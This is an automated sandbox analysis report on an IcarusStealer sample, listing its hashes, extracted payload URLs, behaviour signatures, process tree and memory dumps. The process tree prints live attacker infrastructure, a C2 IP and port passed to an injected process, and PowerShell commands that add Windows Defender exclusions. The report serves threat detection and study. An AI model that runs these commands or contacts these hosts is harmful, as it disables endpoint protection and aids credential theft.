Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05-10-2024 14:39

General

  • Target

    licarisan_api.exe

  • Size

    3.9MB

  • MD5

    65a683124fc4ca1839e95322370e2b0d

  • SHA1

    7a7eafcfa4349e40cb15ab30b5c64d3415e60b96

  • SHA256

    3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f

  • SHA512

    14b6d7d06f1bd02fffa5f0a4aecb8bbb7b1441597d9ac27a888f5ff441fce785809bd675c7ef7b1da7f99a8d61100e030b6c8b7b128515e8d713d4ffec54123f

  • SSDEEP

    49152:bP70hwGvLJT/a9yLe7lAsYaxBjbdOGMneGzxgUgoJUcaqCDx6ITcP2MNoSPhaC+O:nUgoJUBZJoP2MNBajvXOSq

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of FindShellTrayWindow 28 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\licarisan_api.exe
    "C:\Users\Admin\AppData\Local\Temp\licarisan_api.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4272
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:276
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3212
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4400
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1704
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1232
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1988
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1236
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:1752

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    d0c46cad6c0778401e21910bd6b56b70

    SHA1

    7be418951ea96326aca445b8dfe449b2bfa0dca6

    SHA256

    9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

    SHA512

    057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    16KB

    MD5

    6920417e2d7a80ba3030896edce6af3b

    SHA1

    e0f483cd1524e020939f81fbae5b604057082dfe

    SHA256

    f5b0203c95a89cedd5795a8784459114205608e481ca2bcde0ac62780e026361

    SHA512

    d39b8331a5e28de5c0e2837a203136392f4dec5f3be13e596ac983e2dcc48509fa6e7b0079c57a4b4053673feb32d79801aa74bc4462438b6baca290d1deaa4d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nkphc50v.zrj.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/276-11-0x0000000003030000-0x00000000030CC000-memory.dmp

    Filesize

    624KB

  • memory/276-8-0x0000000000970000-0x00000000009F2000-memory.dmp

    Filesize

    520KB

  • memory/276-12-0x0000000005880000-0x0000000005912000-memory.dmp

    Filesize

    584KB

  • memory/1232-21-0x0000000006170000-0x00000000064C7000-memory.dmp

    Filesize

    3.3MB

  • memory/1232-38-0x0000000006670000-0x000000000668E000-memory.dmp

    Filesize

    120KB

  • memory/1232-70-0x0000000007D10000-0x0000000007D2A000-memory.dmp

    Filesize

    104KB

  • memory/1232-66-0x0000000007C40000-0x0000000007CD6000-memory.dmp

    Filesize

    600KB

  • memory/1232-65-0x0000000007A40000-0x0000000007A4A000-memory.dmp

    Filesize

    40KB

  • memory/1232-62-0x0000000007700000-0x00000000077A4000-memory.dmp

    Filesize

    656KB

  • memory/1232-52-0x0000000006C20000-0x0000000006C3E000-memory.dmp

    Filesize

    120KB

  • memory/1232-16-0x00000000051E0000-0x0000000005216000-memory.dmp

    Filesize

    216KB

  • memory/1232-17-0x00000000059F0000-0x000000000601A000-memory.dmp

    Filesize

    6.2MB

  • memory/1232-18-0x00000000057E0000-0x0000000005802000-memory.dmp

    Filesize

    136KB

  • memory/1232-20-0x00000000058F0000-0x0000000005956000-memory.dmp

    Filesize

    408KB

  • memory/1232-19-0x0000000005880000-0x00000000058E6000-memory.dmp

    Filesize

    408KB

  • memory/1232-42-0x0000000006C40000-0x0000000006C74000-memory.dmp

    Filesize

    208KB

  • memory/1232-43-0x000000006F8F0000-0x000000006F93C000-memory.dmp

    Filesize

    304KB

  • memory/1232-39-0x0000000006A60000-0x0000000006AAC000-memory.dmp

    Filesize

    304KB

  • memory/1236-64-0x0000000007C30000-0x0000000007C4A000-memory.dmp

    Filesize

    104KB

  • memory/1236-71-0x0000000007F70000-0x0000000007F78000-memory.dmp

    Filesize

    32KB

  • memory/1236-69-0x0000000007E80000-0x0000000007E95000-memory.dmp

    Filesize

    84KB

  • memory/1236-68-0x0000000007E70000-0x0000000007E7E000-memory.dmp

    Filesize

    56KB

  • memory/1236-67-0x0000000007E40000-0x0000000007E51000-memory.dmp

    Filesize

    68KB

  • memory/1236-53-0x000000006F8F0000-0x000000006F93C000-memory.dmp

    Filesize

    304KB

  • memory/1236-63-0x0000000008270000-0x00000000088EA000-memory.dmp

    Filesize

    6.5MB

  • memory/4272-9-0x0000000000400000-0x0000000000823000-memory.dmp

    Filesize

    4.1MB

  • memory/4272-10-0x0000000000400000-0x0000000000823000-memory.dmp

    Filesize

    4.1MB

  • memory/4272-6-0x0000000000400000-0x0000000000823000-memory.dmp

    Filesize

    4.1MB

  • memory/4272-1-0x0000000000400000-0x0000000000823000-memory.dmp

    Filesize

    4.1MB

  • memory/4272-4-0x0000000000400000-0x0000000000823000-memory.dmp

    Filesize

    4.1MB

  • memory/4272-7-0x0000000000400000-0x0000000000823000-memory.dmp

    Filesize

    4.1MB

  • memory/4272-5-0x0000000000400000-0x0000000000823000-memory.dmp

    Filesize

    4.1MB

  • memory/4272-2-0x0000000000420000-0x0000000000438000-memory.dmp

    Filesize

    96KB

  • memory/4400-13-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/4400-15-0x0000000005910000-0x0000000005EB6000-memory.dmp

    Filesize

    5.6MB